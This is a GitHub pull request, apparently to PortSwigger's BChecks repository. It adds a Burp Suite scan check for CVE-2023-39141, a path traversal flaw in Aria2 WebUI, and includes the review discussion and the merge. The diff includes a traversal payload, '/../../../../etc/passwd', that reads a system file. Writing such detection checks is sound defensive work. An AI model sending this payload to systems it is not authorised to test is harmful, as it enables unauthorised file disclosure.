### PR TITLE
CVE-2023-39141 Aria2 WebUI - Path Traversal

### PR DESCRIPTION
**Pull request by j0hnZ3RA**

### CODE REVIEW

**Review by PortSwiggerWiener — COMMENTED** [review]
Looks good. A potential improvement would be to check that the base response fingerprints Aria2 somehow to differentiate this from generic path traversal.

**Comment by j0hnZ3RA** [comment]
Thank you for the feedback!

I added a previous step to the base response where it is possible to identify it as Aria2 WebUI. Now we are more certain of the result.

Thank you.

File: vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck [hunk 1]
```diff
@@ -0,0 +1,27 @@
...
+given host then
+    send request called check1:
+        method: "GET"
+        path: {base_path}
+
+    send request called check2:
+        method: "GET"
+        path: {potential_path}
+
+    if "Aria2 WebUI" in {check1.response.body} and {check2.response.status_code} is "200" and "root" in {check2.response.body} then
```
Comment (Michelle-PortSwigger) [inline vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck:21]: A very small thing, but could you indent this block?

**Review by Michelle-PortSwigger — CHANGES_REQUESTED** [review]

File: vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck [hunk 2]
```diff
@@ -0,0 +1,25 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2023-39141 Aria2 WebUI - Path Traversal"
+    description: "Check for CVE-2023-39141"
+    author: "Joao Paulo Assis (j0hnZ3RA)"
+    tags: "CVE-2023-39141","lfi","unauth","aria2","webui"
+
+
+define:
+    potential_path = "/../../../../etc/passwd"
```
[the remark this answers is not in the document]
Comment (j0hnZ3RA) [reply vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck]: Done!

File: vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck (hunk 1 above)
Comment (j0hnZ3RA) [reply vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck]: Done!

**Review by j0hnZ3RA — COMMENTED** [review]
Done!

**Review by Michelle-PortSwigger — APPROVED** [review]

**Review by Michelle-PortSwigger — APPROVED** [review]
Thanks for making the revisions. Looks good :)

**Review by PortSwiggerWiener — APPROVED** [review]
Looks good. 👍

**Comment by michael-eaton-portswigger** [comment]
@j0hnZ3RA As a contributor to our GitHub repository, we would like to invite you to our closed Discord community.

It is a place where passionate Burp users, including people who directly work on building and developing Burp here at PortSwigger, can talk about the tooling and web security in general.

If you would like to join, please email us at support@portswigger.net and we will send over an invite link.

Thank you!

**Pull request merged**